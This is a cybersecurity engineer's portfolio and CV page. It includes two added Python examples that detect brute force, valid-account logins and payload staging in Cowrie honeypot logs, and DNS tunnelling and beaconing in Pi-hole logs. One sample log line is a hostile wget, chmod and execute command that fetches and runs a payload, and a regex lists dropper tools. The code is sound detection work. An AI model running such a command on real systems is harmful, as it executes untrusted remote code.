singhamanpreet751@gmail.com | +44 7717 109292 | LinkedIn | GitHub | amanpreetmatharu.com
Xposr | Sentrix | Skilled Worker Visa · Active
Immediately Available · London, UK · Skilled Worker Visa Active
Cyber Security Engineer · Detection Engineer · Platform Builder

Amanpreet Singh Matharu

Microsoft Sentinel · KQL · Splunk · MITRE ATT&CK · Xposr · Sentrix

I design detection pipelines, operate SOC infrastructure, and independently ship commercial cybersecurity platforms. Xposr exposes verified risk across your attack surface. Sentrix engineers the detections that catch it. Both live, billed, and in production.

5+ Years in Tech · 2 Live SaaS Products · 20+ KQL Hunt Rules · MITRE ATT&CK Aligned

London, UK · Skilled Worker Visa
Target Roles
SOC Analyst · Detection Engineer · Security Engineer · Threat Hunter · Sentinel/Splunk Engineer
Location
London & across England · On-site, Hybrid, or Remote · Available now
Notice Period
Immediately available · Skilled Worker Visa active

About Me

I am a Cyber Security Engineer actively seeking my next role in SOC operations or detection engineering. With 5+ years across SIEM platforms, endpoint security, and real-world threat detection, I can contribute to a security team from day one — no ramp-up period needed. Skilled Worker Visa active. Available immediately.

I design and operate SIEM-based detections using Microsoft Sentinel (KQL) and Splunk (SPL) — investigating incidents, tuning alerts, reducing false positives, and improving detection quality. All work is aligned to MITRE ATT&CK, covering identity abuse, MFA fatigue, PowerShell misuse, ransomware indicators, and lateral movement.

Beyond traditional security work, I independently design and ship commercial cybersecurity platforms. Xposr — expose what's real. Verification-first security assessment: every finding Confirmed, Likely, or Unverified — no noise. Sentrix — engineer what detects it. SOC rule management from raw log to production-ready Sigma rule. Both are live, billed, and in production.

Currently contracted at Guard IQ (M365, Atera RMM, Huntress EDR) while developing both platforms. I thrive in fast-paced environments, take ownership of problems end-to-end, and communicate clearly with both technical and non-technical stakeholders. Looking for a full-time role where I can protect real infrastructure with real detections.

Amanpreet S. Matharu
Cyber Security Engineer
// Current Status
Guard IQ — Sys Admin: ACTIVE
Xposr · xposr.io: LIVE
Sentrix · sentrix.io: LIVE
Skilled Worker Visa (UK): ACTIVE
// Languages
English: PROFESSIONAL
Hindi: PROFESSIONAL
Punjabi: NATIVE
5+ Years in Cyber Security
2 Live SaaS Products Shipped
22 Scanner Modules Built
20+ Custom KQL Detections
MSc Cyber Security · Merit
UK Right to Work · Active

Technical Skills

SIEM & Detection
Microsoft Sentinel · Splunk Enterprise · KQL (Advanced) · SPL · Log Analytics · Sigma Rules · SigmaHQ
Threat Hunting
MITRE ATT&CK · IOC Analysis · FP Reduction · BEC Analysis · Ransomware Detection · Sysmon
Endpoint & Cloud
Defender XDR · Azure AD / Entra ID · Defender for Identity · MFA · BitLocker via GPO · Huntress EDR
Networking & Infra
TCP/IP · DNS / DHCP · VLANs · Firewalls · VPNs (CCNA) · DNSSEC · Wireshark · Tailscale
Cloud & Ops
Railway · Vercel · Cloudflare TLS/WAF · Sentry · APScheduler · Docker
Scripting & Automation
Python · Bash · JSON Parsing · Raspberry Pi · IoT Sensors · Linux
Systems Admin
Microsoft 365 · Exchange Online · Atera RMM · N-able · Active Directory · GPO
SOC & Incident Response
BEC Investigation · IR Playbooks · Alert Triage · NIST · SANS · Attack Path Analysis

Key Projects

Sentinel Threat Hunting Portfolio
KQL · Sysmon · MITRE ATT&CK
  • 20+ custom KQL queries — PowerShell abuse, C2 beaconing, lateral movement
  • BEC detections: MFA fatigue, inbox rules, token replay
Cowrie SSH Honeypot & SOC Pipeline
Splunk · MITRE ATT&CK · Raspberry Pi
  • Real adversary telemetry → Splunk; MITRE-mapped detections T1110, T1078, T1059
  • IR playbooks for high-severity events
DNS Security Monitoring Platform
Pi-hole · DNSSEC · Splunk · Tailscale
  • Full recursive DNSSEC + Splunk UF; detects DNS tunnelling & beaconing (T1071)
Cyber-Physical SOC: IoT Pipeline
Splunk · Python · Raspberry Pi
  • Sensors → JSON → Splunk UF with SPL time-window correlation for FP reduction
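As an added illustration of the MITRE-mapped honeypot detections listed under the Cowrie project above (T1110, T1078, T1059), the following Python is example code written for this page, not code from the author's own pipeline. The Cowrie JSON log lines are constructed to mimic Cowrie's real event format (`cowrie.login.failed`, `cowrie.login.success`, `cowrie.command.input`), the brute-force threshold and window are assumptions to tune against real telemetry, and the dropper regex is a deliberately small pattern set.

```python
"""Added example: ATT&CK-mapped detections over Cowrie SSH honeypot JSON logs.

The log lines below are constructed to mimic Cowrie's JSON output (eventid,
src_ip, username, password, input, session, timestamp); they are not real
captured telemetry. Thresholds are assumptions to tune against your own data.
"""
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.5 sprays five passwords in ~35 s, then logs in
# and stages a payload; 198.51.100.22 fails once and is not interesting.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.5","session":"a1","timestamp":"2025-01-10T08:00:00.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","username":"root","password":"123456","session":"a1","timestamp":"2025-01-10T08:00:01.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","username":"root","password":"admin","session":"a1","timestamp":"2025-01-10T08:00:09.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","username":"root","password":"toor","session":"a1","timestamp":"2025-01-10T08:00:18.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","username":"admin","password":"admin","session":"a1","timestamp":"2025-01-10T08:00:27.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.5","username":"pi","password":"raspberry","session":"a1","timestamp":"2025-01-10T08:00:36.000000Z"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.5","username":"root","password":"password","session":"a1","timestamp":"2025-01-10T08:00:40.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.5","input":"cd /tmp; wget http://198.51.100.7/x86 -O .x; chmod +x .x; ./.x","session":"a1","timestamp":"2025-01-10T08:00:45.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.5","input":"uname -a","session":"a1","timestamp":"2025-01-10T08:00:46.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.22","username":"ubuntu","password":"ubuntu","session":"b2","timestamp":"2025-01-10T08:05:00.000000Z"}
"""

BRUTE_FORCE_THRESHOLD = 5                    # failed logins per source IP ...
BRUTE_FORCE_WINDOW = timedelta(seconds=60)   # ... within this sliding window
# Command fragments typical of payload staging after a honeypot login (assumed set).
DROPPER_RE = re.compile(r"\b(wget|curl|tftp|busybox)\b|chmod\s+\+x|/tmp/", re.IGNORECASE)


def parse_cowrie(text):
    """Parse newline-delimited Cowrie JSON into dicts sorted by timestamp."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ")
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(events, threshold=BRUTE_FORCE_THRESHOLD, window=BRUTE_FORCE_WINDOW):
    """Return ATT&CK-tagged alerts: T1110 brute force (one per source IP),
    T1078 valid-account login (escalated if preceded by failures), and
    T1059 suspicious command input."""
    alerts = []
    failures = defaultdict(deque)   # src_ip -> timestamps of recent failures
    brute_forced = set()
    for ev in events:
        ip, eid, ts = ev["src_ip"], ev["eventid"], ev["ts"]
        if eid == "cowrie.login.failed":
            recent = failures[ip]
            recent.append(ts)
            while recent and ts - recent[0] > window:   # slide the window forward
                recent.popleft()
            if len(recent) >= threshold and ip not in brute_forced:
                brute_forced.add(ip)
                alerts.append({"technique": "T1110", "name": "Brute Force",
                               "severity": "medium", "src_ip": ip,
                               "detail": f"{len(recent)} failed logins within "
                                         f"{int(window.total_seconds())}s"})
        elif eid == "cowrie.login.success":
            prior = len(failures.get(ip, ()))   # any success on a honeypot is notable
            alerts.append({"technique": "T1078", "name": "Valid Accounts",
                           "severity": "high" if prior else "medium", "src_ip": ip,
                           "detail": f"login {ev['username']}:{ev['password']} "
                                     f"after {prior} recent failures"})
        elif eid == "cowrie.command.input" and DROPPER_RE.search(ev.get("input", "")):
            alerts.append({"technique": "T1059", "name": "Command and Scripting Interpreter",
                           "severity": "critical", "src_ip": ip, "detail": ev["input"]})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_cowrie(SAMPLE_LOG)):
        print(f"[{a['severity']:<8}] {a['technique']} {a['name']} {a['src_ip']}: {a['detail']}")
```

On the constructed sample this yields three alerts for 203.0.113.5 (T1110, then T1078 at high severity because it follows the failures, then T1059 for the wget/chmod chain) and nothing for the single-failure source. The same three conditions map directly onto Splunk searches (`bin _time span=60s | stats count by src_ip`, a `transaction` on session for failure-then-success, and a regex match on `input`), which is how they would be hosted in a Splunk pipeline.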

Professional Experience

Feb 2026 — Present
Guard IQ
Contract · Remote, UK
ACTIVE
System Administrator
  • Administer Microsoft 365 — Exchange Online, identity management, mailbox administration, and security configurations for client environments.
  • Manage endpoint monitoring, patch management, and remote troubleshooting via Atera RMM and N-able across Windows/Linux fleets.
  • Investigate and remediate endpoint incidents based on Huntress EDR alerts; perform threat triage and root-cause analysis.
  • Implement MFA, conditional access policies, and system hardening across client environments.
2024 — Present
Self-Directed
Independent · Remote
ACTIVE
Independent Cybersecurity Solution Builder
  • Designed and shipped Xposr (xposr-production.up.railway.app) — a verification-first security assessment platform. 22 parallel scanner modules including Risk Engine, Correlation Engine, Evidence Engine, Attack Path Builder, and AI deduplication. CVSS scoring, SARIF/JSON/CSV export, compliance scoring, attack path visualisation. Deployed on Railway.
  • Designed and shipped Sentrix (smartswingalerts.com) — a SOC detection engineering and rule management platform. Full Sigma lifecycle (import/export/SigmaHQ browser), MITRE ATT&CK mapping, Detection Lifecycle workspace, multi-LLM bring-your-own-key, Splunk & Pi-hole integrations, and sentrix_ API keys for programmatic access. Deployed on Vercel.
  • Both platforms security-hardened: CSP headers, Cloudflare TLS, Supabase RLS, rate limiting, prompt injection mitigation, production monitoring via Sentry.
Jan 2023 — Feb 2025
University of West London
Part-time · On-site
Cyber Security Lecturer
  • Delivered hands-on SIEM, incident response, and Active Directory attack labs aligned to real SOC workflows.
  • Guided students through malware behaviour labs, PowerShell investigations, and identity attack simulations (pass-the-hash, Kerberoasting, MFA bypass).
  • Taught Windows Server, Active Directory, VLANs, routing, subnetting, VPNs, and cloud identity security.
  • Developed course materials covering threat hunting methodologies, MITRE ATT&CK mapping, and CTF-style investigation scenarios.
Jan 2021 — Present
Self-Directed
Independent Research
Detection Engineering (Self-Directed)
  • Built cyber-physical SOC prototype: DHT11/PIR/MPU6050 sensors → Raspberry Pi → JSON → Splunk UF with SPL time-window correlation.
  • Deployed Cowrie SSH honeypot, captured real adversary telemetry, built MITRE-mapped detections and IR playbooks in Splunk.
  • Built DNS security monitoring platform: Pi-hole + Unbound + DNSSEC + Tailscale + Splunk — detection of tunnelling and beaconing.
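The tunnelling and beaconing heuristics named in the DNS platform bullet, shown as an added example in Python rather than as the author's own Splunk searches. The query-log lines are constructed in Pi-hole's dnsmasq `query[TYPE] name from client` format and are not real telemetry; T1071.004 is the DNS sub-technique of T1071; the two-label cut for the registered domain, the assumed log year, and every threshold are assumptions (a production build would use the public suffix list and tune against baseline traffic).

```python
"""Added example: DNS tunnelling (T1071.004) and beaconing (T1071) detection
over Pi-hole / dnsmasq query-log lines. Sample lines are constructed, not
captured; thresholds and the two-label registered-domain cut are assumptions."""
import math
import re
import statistics
from collections import Counter, defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) dnsmasq\[\d+\]: query\[(\w+)\] (\S+) from (\S+)$")
LOG_YEAR = 2025   # dnsmasq lines carry no year; assumed for the sample

# Constructed sample: normal browsing from .10, a 60 s beacon from .30, and six
# TXT queries with 32-char high-entropy labels from .20 (tunnel-style traffic).
SAMPLE_LOG = """\
Jan 10 08:00:00 dnsmasq[512]: query[A] www.example.com from 192.168.1.10
Jan 10 08:00:03 dnsmasq[512]: query[AAAA] www.example.com from 192.168.1.10
Jan 10 08:00:17 dnsmasq[512]: query[A] mail.example.com from 192.168.1.10
Jan 10 08:01:00 dnsmasq[512]: query[A] beacon.example from 192.168.1.30
Jan 10 08:02:00 dnsmasq[512]: query[A] beacon.example from 192.168.1.30
Jan 10 08:03:01 dnsmasq[512]: query[A] beacon.example from 192.168.1.30
Jan 10 08:04:00 dnsmasq[512]: query[A] beacon.example from 192.168.1.30
Jan 10 08:05:00 dnsmasq[512]: query[A] beacon.example from 192.168.1.30
Jan 10 08:06:00 dnsmasq[512]: query[A] beacon.example from 192.168.1.30
Jan 10 08:07:10 dnsmasq[512]: query[TXT] 0a1b2c3d4e5f6789f9e8d7c6b5a43210.t.tunnel.example from 192.168.1.20
Jan 10 08:07:11 dnsmasq[512]: query[TXT] 5f3e1d0c9b7a86422468a7b9c0d1e3f5.t.tunnel.example from 192.168.1.20
Jan 10 08:07:12 dnsmasq[512]: query[TXT] 9c8d7e6f5a4b321001234a5b6c7d8e9f.t.tunnel.example from 192.168.1.20
Jan 10 08:07:13 dnsmasq[512]: query[TXT] e2f3a4b5c6d70819918a7b6c5d4e3f20.t.tunnel.example from 192.168.1.20
Jan 10 08:07:14 dnsmasq[512]: query[TXT] b1c2d3e4f5a690788709a6f5e4d3c2b1.t.tunnel.example from 192.168.1.20
Jan 10 08:07:15 dnsmasq[512]: query[TXT] 7d6e5f4a3b2c1098890a1b2c3d4e5f67.t.tunnel.example from 192.168.1.20
"""


def shannon_entropy(s):
    """Bits per character; hex-only labels top out at 4.0, base64 near 6.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def parse_pihole(text, year=LOG_YEAR):
    """Parse dnsmasq query lines into dicts sorted by time."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        rows.append({"ts": ts, "qtype": m.group(2),
                     "qname": m.group(3).lower().rstrip("."), "client": m.group(4)})
    return sorted(rows, key=lambda r: r["ts"])


def registered_domain(qname):
    """Assumption: last two labels; use the public suffix list in production."""
    return ".".join(qname.split(".")[-2:])


def detect_tunnelling(rows, min_unique=5, min_len=20, min_entropy=3.5):
    """Flag (client, domain) pairs with many distinct, long, high-entropy
    leftmost labels: the signature of data encoded into subdomains."""
    labels = defaultdict(set)
    for r in rows:
        parts = r["qname"].split(".")
        if len(parts) > 2:
            labels[(r["client"], registered_domain(r["qname"]))].add(parts[0])
    alerts = []
    for (client, domain), subs in labels.items():
        if len(subs) < min_unique:
            continue
        mean_len = statistics.mean(len(s) for s in subs)
        mean_ent = statistics.mean(shannon_entropy(s) for s in subs)
        if mean_len >= min_len and mean_ent >= min_entropy:
            alerts.append({"technique": "T1071.004", "name": "DNS tunnelling",
                           "client": client, "domain": domain,
                           "unique_subdomains": len(subs), "mean_entropy": round(mean_ent, 2)})
    return alerts


def detect_beaconing(rows, min_queries=5, max_cv=0.2):
    """Flag (client, qname) pairs queried at near-constant intervals:
    coefficient of variation of the gaps at or below max_cv."""
    times = defaultdict(list)
    for r in rows:
        times[(r["client"], r["qname"])].append(r["ts"])
    alerts = []
    for (client, qname), ts in times.items():
        if len(ts) < min_queries:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            alerts.append({"technique": "T1071", "name": "Beaconing", "client": client,
                           "qname": qname, "queries": len(ts),
                           "mean_interval_s": round(mean, 1), "cv": round(cv, 3)})
    return alerts


if __name__ == "__main__":
    rows = parse_pihole(SAMPLE_LOG)
    for a in detect_tunnelling(rows) + detect_beaconing(rows):
        print(a)
```

Grouping beacon candidates by exact query name keeps the tunnel traffic (six different names, one query each) from also tripping the beacon rule, while grouping tunnel candidates by registered domain is what collapses those six names into one alert. Both heuristics are per-client, so a NAT gateway in front of the resolver would need the client field replaced with something finer grained.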
Jun 2018 — Mar 2020
Nagarro
Full-time · Hybrid, India
Information Technology Analyst
  • Administered enterprise Windows/Linux environments; managed Active Directory, GPOs, permissions, and security patching.
  • Configured DNS, DHCP, VPN, and firewall rules; used Wireshark to diagnose network anomalies.
  • Supported internal audits and implemented compliance controls aligned with corporate security requirements.
Ready to contribute to your security team from day one.
SOC Analyst · Detection Engineer · Security Infrastructure · London & England

Education & Certifications

MSc Cyber Security
University of West London
Feb 2021 – Jul 2022
Merit
Fundamentals of Cybersecurity · Network & Systems Security · Applied Cryptography · Security & Assurance (GRC) · Big Data Analytics
Computer Systems Networking & Telecoms
Jetking
Jun 2017 – Jan 2018
Distinction
CCNA · MCSA · Active Directory · Server 2008/2012/2016 · Routing & Switching · BGP · VLANs · Network Security
BSc Information Technology
Guru Nanak Dev University
2014 – 2017
Foundation in computer science, software engineering, database systems, and networking.
ACTIVE · Skilled Worker Visa — Right to Work (UK)
ACTIVE · MSc Cyber Security — UWL (Merit)
ACTIVE · Networking — Jetking (Distinction)
OPER. · Atera RMM — Operational Experience
OPER. · Huntress EDR — Operational Experience
OPER. · Microsoft Sentinel & KQL — Production Use
LIVE · Xposr · Railway
LIVE · Sentrix · Vercel

Get In Touch

Open to SOC Analyst, Detection Engineer, and Security Infrastructure roles across England — on-site, hybrid, or remote. Skilled Worker Visa active. Also open to SaaS collaboration and cybersecurity product partnerships around Xposr and Sentrix.

London, UK · Available Now